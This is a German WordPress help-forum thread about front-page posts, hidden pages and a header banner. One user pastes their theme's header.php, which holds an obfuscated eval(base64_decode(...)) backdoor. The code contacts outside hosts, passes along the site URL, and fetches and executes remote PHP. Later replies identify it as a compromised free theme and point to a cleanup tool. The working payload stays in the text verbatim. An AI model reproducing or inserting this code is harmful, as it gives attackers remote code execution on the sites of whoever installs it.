beiträge ins archiv und unabhängige seiten

• Hallo,

ich habe folgendes theme: apples (Free Wordpress Themes)

Jetzt habe ich aber folgende zwei Probleme:

1. Ich habe viele viele Einträge, die automatisch ja auf der startseite sind. Diese will ich dort nicht mehr haben, will sie aber auch nicht löschen, sondern sie sollen weiterhin noch unter archiv aufrufbar sein. kann mir jemand erklären, wie ich das mache?

2. Ich will auch eine Seite machen, die nirgendwo in der Navigation auftaucht, sondern zu der ich ein Link im Text machen kann. Wenn ich eine neue Seite mache und diese veröffentliche, geht die automatisch auch in die navigation ein. Wenn ich sie nicht veröffentliche, kann nur ich sie sehen, was auch kontraproduktiv ist.

wäre super, wenn ihr mir helfen könntet.

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• 1. Ich habe viele viele Einträge, die automatisch ja auf der startseite sind. Diese will ich dort nicht mehr haben, will sie aber auch nicht löschen, sondern sie sollen weiterhin noch unter archiv aufrufbar sein. kann mir jemand erklären, wie ich das mache?

"Auf der Startseite" heißt? Dort sind *alle* Beiträge gelistet, oder dort sind Links zu weiteren Seiten, sowas wie "ältere Beiträge" oder eine Seitennavigation?
    Archiv gibts in WP automatisch.
    Template Tags/wp get archives « WordPress Codex
    Oder das entsprechende Widget nutzen.

Zitat

2. Ich will auch eine Seite machen, die nirgendwo in der Navigation auftaucht, sondern zu der ich ein Link im Text machen kann. Wenn ich eine neue Seite mache und diese veröffentliche, geht die automatisch auch in die navigation ein. Wenn ich sie nicht veröffentliche, kann nur ich sie sehen, was auch kontraproduktiv ist.

WordPress Deutschland FAQ » Wie kann ich bestimmte Seiten von der Auflistung ausschließen?

• Hallo,

ich habe folgendes theme: apples (Free Wordpress Themes)

Jetzt habe ich aber folgende zwei Probleme:

1. Ich habe viele viele Einträge, die automatisch ja auf der startseite sind. Diese will ich dort nicht mehr haben, will sie aber auch nicht löschen, sondern sie sollen weiterhin noch unter archiv aufrufbar sein. kann mir jemand erklären, wie ich das mache?

eine statische Seite als Startseite nutzen
    irgendwo unter
    Admincenter=>Einstellungen gehtdas

Zitat

wäre super, wenn ihr mir helfen könntet.

da hilft das Plugin page link Manager

Statische Seiten bequem im Admincenter ausschließen-Page Link Manager

lg

• Hi,

vielen Dank, dass konnte ich schonmal gut umsetzen udn hat super geklappt.

Nun habe ich noch eine neue Frage. Bei dem Theme ist oben ja nur so ein schleier und ein schriftzug. Wie bekomme ich dort ein Banner hin? Also ich habe eine jpg datei, die an deren stelle treten soll. Ich hab mal hier den code des headers, vielleicht is des für euch ja gnaz einfach, ich kann sowas garnet^^

PHP
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><head profile="http://gmpg.org/xfn/11"><title><?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> &raquo; Blog Archive <?php } ?> <?php wp_title(); ?></title><meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" /><meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats --><meta name="robots" content="all,index,noarchive" /><link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" /><link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" /><link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /><?php wp_head(); ?></head><body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?><div id="page">    <div id="header">        <div id="HeaderNav">            <a href="#">Weiterempfehlen</a>        </div>        <div id="title"><a href="<?php echo get_settings('home'); ?>/"><?php bloginfo('name'); ?></a></div>        <div id="description"><?php bloginfo('description'); ?></div>    </div>        <hr />

Einmal editiert, zuletzt von jottlieb (4. Juli 2008 um 21:47)

• Was soll denn dieser base64_decode-Schrott?
    Kann es sein, dass dein Blog gehackt wurde?

"Eine gut gestellte Frage ist schon halb beantwortet."

• Was soll denn der Nachlademist da drin ?

... mal dekodiert !

• Das ist ein gehacktes Blog!
    Aber es scheint bereits Bestandteil des Themes zu sein, denn schon seit 2007 findest du das in Google. Es werden kompromittierte Themes zu download angeboten, du solltest dein Wegspace schleunigst untersuchen und mit einen sauberen Theme betreiben!
    In wieweit deine DB jetzt schon missbraucht ist, kann ich nicht sagen. Auch diese solltest du untersuchen!

• also ich weiss net, ob ich da nun schrott gemacht habe oder einfach nur beschäftigungstherapie: Aber im rest des theme-codes gibt es kein weiteres mal solch ein base64_decode...

• also ich weiss net, ob ich da nun schrott gemacht habe oder einfach nur beschäftigungstherapie: Aber im rest des theme-codes gibt es kein weiteres mal solch ein base64_decode...

Braucht ja auch nicht. Ist es in der header.php ist es überall.

"Eine gut gestellte Frage ist schon halb beantwortet."

• was wie wo?

also ich hab wie gesagt von sowas garkeine ahnung. wie untersuche ich was und was wurde da gemacht? o.0

hier wird geholfen

Gehackt!

da gibts einen Link zu einer Datei die dir den schädlichen Code aufspürt und so weiter,

lg

• No suspicious plugins found

Hooray! No suspicious plugins found in the active_plugins database record.
    No suspicious posts or comments found

Hooray! No suspicious text found in your posts or comments tables!

das müsste ja nun heissen, dass alles ok ist, oder?
    (das kam, anchdem ich den einen code gelöscht hatte)

kann mir nun vielleicht jemand sagen, wie das eigentliche problem, der header als jpg. gelöst werden kann? xD

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!